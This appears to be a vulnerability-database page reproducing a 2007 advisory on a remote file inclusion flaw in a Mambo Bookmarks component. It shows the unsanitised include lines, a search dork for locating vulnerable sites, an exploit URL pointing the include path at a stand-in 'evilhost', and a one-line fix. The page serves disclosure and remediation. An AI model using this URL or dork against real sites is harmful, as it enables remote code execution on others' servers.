Lucene search

K

mambobm.rfi.txt

🗓️ 14 Aug 2007 00:00:00Reported by vituxType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 36 Views

Application Bookmarks mambo Component URL Variable $mosConfig_absolute_path not sanitized xpl works with register_globals=on in components/com_bookmarks/bookmarks_export.php Exploit dork com_bookmark

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Application : Bookmarks - mambo Component  
  
URL :  
http://mamboxchange.com/frs/download.php/4274/MOS_Com_Bookmarks25-Final_a.zip  
  
Variable $mosConfig_absolute_path not sanitized: xpl works with  
register_globals=on  
in components/com_bookmarks/bookmarks_export.php on line 22,27,29  
  
$require_once( $mosConfig_absolute_path . "/includes/mambo.php" );  
$include_once($mosConfig_absolute_path.'/components/com_bookmarks/language/'  
. $mosConfig_lang . '.php');  
$include_once($mosConfig_absolute_path.'/components/com_bookmarks/language/english.php');  
  
Exploit:  
~~~~~~~~  
  
dork: "com_bookmarks"  
  
http://www.vuln.com/components/com_bookmarks/bookmarks_export.php?mosConfig_absolute_path=http://evilhost  
  
Fix  
~~~~  
  
Add before code:  
defined('_VALID_MOS') or die('Direct access to this location is not  
allowed.');  
  
Discovered By : vitux  
Thanks To : #[email protected], #[email protected], #batamhacker@  
dal.net, #[email protected]  
special To : donny indocom, eko indocom, ^BLaCk_BaNDitS^, urang  
subang sadaya, pokona mah kabeh lah  
mail : [email protected], [email protected]  
  
# cilacap 12th august 2007  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
14 Aug 2007 00:00Current
7.4High risk
Vulners AI Score7.4
36
.json
Report